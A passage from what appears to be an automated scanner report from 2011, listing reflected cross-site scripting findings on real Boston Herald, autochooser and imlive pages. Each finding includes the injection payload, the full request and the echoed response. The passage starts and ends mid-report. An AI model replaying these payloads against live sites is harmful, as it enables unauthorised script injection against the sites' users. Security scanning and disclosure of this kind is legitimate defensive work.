Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home42c4a\"><script>alert(1)</script>4b0e292800b@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.210. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582ab</script><script>alert(1)</script>272b48e55fe was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top582ab</script><script>alert(1)</script>272b48e55fe&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:22 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2143
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
LING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top582ab</script><script>alert(1)</script>272b48e55fe">
...[SNIP]...

4.211. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d57af"><script>alert(1)</script>7c2b6abc9e8 was submitted in the position parameter. This input was echoed as d57af\"><script>alert(1)</script>7c2b6abc9e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Topd57af"><script>alert(1)</script>7c2b6abc9e8&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:21 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2107
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Topd57af\"><script>alert(1)</script>7c2b6abc9e8">
...[SNIP]...

4.212. http://boston30.autochooser.com/results.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6bfd0%3balert(1)//cb19586ae74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bfd0;alert(1)//cb19586ae74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.asp?6bfd0%3balert(1)//cb19586ae74=1 HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:24:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:23:15 GMT
Set-Cookie: cid=4473467; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=KPBLDIICNCEJNNNLADJNNJPH; path=/
Cache-control: private
Content-Length: 56618


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
<!--
//This area reserved for page-specific scripts
   var ac6bfd0;alert(1)//cb19586ae74 = new Array ( '1' )
//-->
...[SNIP]...

4.213. http://boston30.autochooser.com/results.asp [pagename parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The value of the pagename request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60368'%3balert(1)//0236c25829e was submitted in the pagename parameter. This input was echoed as 60368';alert(1)//0236c25829e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.asp?gid=0&pagename=dealersearch.asp60368'%3balert(1)//0236c25829e&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:22:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:21:44 GMT
Set-Cookie: cid=4473446; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=FOBLDIICPJKEJBPLDKOCMMDB; path=/
Cache-control: private
Content-Length: 76012


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
<!--
//This area reserved for page-specific scripts
   var acgid = new Array ( '0' )
var acpagename = new Array ( 'dealersearch.asp60368';alert(1)//0236c25829e' )
var acresulttype = new Array ( '2' )
var acpostto = new Array ( 'results.asp' )
//-->
...[SNIP]...

4.214. http://boston30.autochooser.com/results.asp [postto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The value of the postto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ffc'%3balert(1)//3960f4bf99 was submitted in the postto parameter. This input was echoed as 23ffc';alert(1)//3960f4bf99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp23ffc'%3balert(1)//3960f4bf99 HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:24:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:23:33 GMT
Set-Cookie: cid=4473468; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=LPBLDIICLJKNBKAJIDLGADOK; path=/
Cache-control: private
Content-Length: 75946


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
area reserved for page-specific scripts
   var acgid = new Array ( '0' )
var acpagename = new Array ( 'dealersearch.asp' )
var acresulttype = new Array ( '2' )
var acpostto = new Array ( 'results.asp23ffc';alert(1)//3960f4bf99' )
//-->
...[SNIP]...

4.215. http://bostonherald.com/news/document.bg [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/document.bg

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fee9"%3balert(1)//3539e9e682 was submitted in the f parameter. This input was echoed as 8fee9";alert(1)//3539e9e682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/document.bg?f=misc/100216housing.pdf8fee9"%3balert(1)//3539e9e682&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script type="text/javascript">

var iframe_container_div = $("iframe_wrapper");
var iframe_pdf_source = "http://multimedia.bostonherald.com/misc/100216housing.pdf8fee9";alert(1)//3539e9e682";

a1 = document.createElement("iframe");
a1.setAttribute("id","document_reader");
a1.setAttribute("src",iframe_pdf_source);
a1.setAttribute("frameborder","0");
a1.setAttribute("scrolling","no")
...[SNIP]...

4.216. http://bostonherald.com/news/document.bg [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/document.bg

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload ef2a2<script>alert(1)</script>16a85c5a392 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnershipef2a2<script>alert(1)</script>16a85c5a392&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:22:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<h1>Massachusetts Housing Partnershipef2a2<script>alert(1)</script>16a85c5a392</h1>
...[SNIP]...

4.217. http://bostonherald.com/search/ [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c37a"><script>alert(1)</script>110b65414ac was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Annette+Bening5c37a"><script>alert(1)</script>110b65414ac&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Annette Bening5c37a"><script>alert(1)</script>110b65414ac" name="topic" />
...[SNIP]...

4.218. http://bostonherald.com/search/ [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e99ef</script><script>alert(1)</script>6ffe388eb75 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?topic=Annette+Beninge99ef</script><script>alert(1)</script>6ffe388eb75&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:22:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script language="Javascript">
// Ajax search


page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Annette Beninge99ef</script><script>alert(1)</script>6ffe388eb75');
//pageTracker._trackPageview('/search/index.bg?&amp;order=&amp;page=1');
location.hash='articleFull';
</script>
...[SNIP]...

4.219. http://bostonherald.com/track/inside_track/view.bg [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6964e'-alert(1)-'6dd42dc7131 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track/inside_track/view.bg?articleid=1312557&format=comments6964e'-alert(1)-'6dd42dc7131&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:23:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312557&format=comments6964e'-alert(1)-'6dd42dc7131&srvc=track&position=2'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //------
...[SNIP]...

4.220. http://bostonherald.com/track/star_tracks/view.bg [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4303'-alert(1)-'7c0f4b2ce6d was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track/star_tracks/view.bg?articleid=1312549&format=commentsc4303'-alert(1)-'7c0f4b2ce6d&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:23:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312549&format=commentsc4303'-alert(1)-'7c0f4b2ce6d&srvc=track&position=3'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //------
...[SNIP]...

4.221. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?34723"><a>3f71d325883=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: spvdr=vd=04dc6090-bd1f-4d6e-bf28-729633a25e9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:51 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:51 GMT
Connection: close
Content-Length: 18835
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;">
...[SNIP]...

4.222. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: spvdr=vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 19010
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.223. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:58 GMT
Connection: close
Content-Length: 21217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;">
...[SNIP]...

4.224. http://br.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:10 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.225. http://br.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

